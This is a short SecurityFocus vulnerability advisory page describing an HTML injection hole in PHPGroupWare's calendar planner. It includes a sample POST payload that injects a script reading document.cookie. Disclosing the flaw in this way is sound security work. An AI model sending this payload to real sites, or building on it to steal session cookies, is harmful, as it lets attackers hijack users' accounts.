Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHPGroupWare Index.PHP HTML Injection Vulnerability

No exploit is required, the following example is available.

http://[target]/[phpgroupware_directory]/index.php?menuaction=calendar.uicalendar.planner
POST DATA: date="><script>alert(document.cookie)</script>







 

Privacy Statement
Copyright 2009, SecurityFocus